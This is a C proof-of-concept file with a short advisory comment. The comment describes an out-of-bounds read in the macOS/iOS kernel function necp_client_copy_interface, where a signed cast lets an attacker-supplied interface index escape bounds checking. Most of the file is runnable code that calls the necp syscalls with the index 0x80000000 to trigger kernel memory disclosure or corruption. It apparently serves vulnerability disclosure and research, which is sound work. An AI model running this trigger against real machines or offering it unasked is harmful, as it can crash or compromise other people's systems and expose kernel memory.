// ianbeer
#if 0
MacOS/iOS kernel memory corruption due to bad bounds checking in necp_client_copy_interface

necp_client_copy_interface contains this code where interface_index is an attacker controlled
uint32_t:

	if (interface_index != IFSCOPE_NONE && (int)interface_index <= if_index) {
		interface = ifindex2ifnet[interface_index];
	}

This leads to an interface pointer being read out of bounds. This can lead to kernel memory disclosure
and also memory corruption as a lock is taken on the interface object.

tested on MacOS 10.12.3 (16D32) on MacbookAir5,2
#endif

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/syscall.h>

int necp_open(int flags) {
  return syscall(SYS_necp_open, flags);
}

int necp_client_action(int necp_fd, uint32_t action, uuid_t client_id, size_t client_id_len, uint8_t* buffer, size_t buffer_size) {
  return syscall(SYS_necp_client_action, necp_fd, action, client_id, client_id_len, buffer, buffer_size);
}

#define NECP_CLIENT_ACTION_COPY_INTERFACE 9

int main() {
  int fd = necp_open(0);

  uint32_t interface_id = 0x80000000;
  uint8_t buffer[100];
  necp_client_action(fd,
                     NECP_CLIENT_ACTION_COPY_INTERFACE,
                     &interface_id,
                     4,
                     buffer,
                     sizeof(buffer));

  printf("%d\n", fd);
  return 0;
}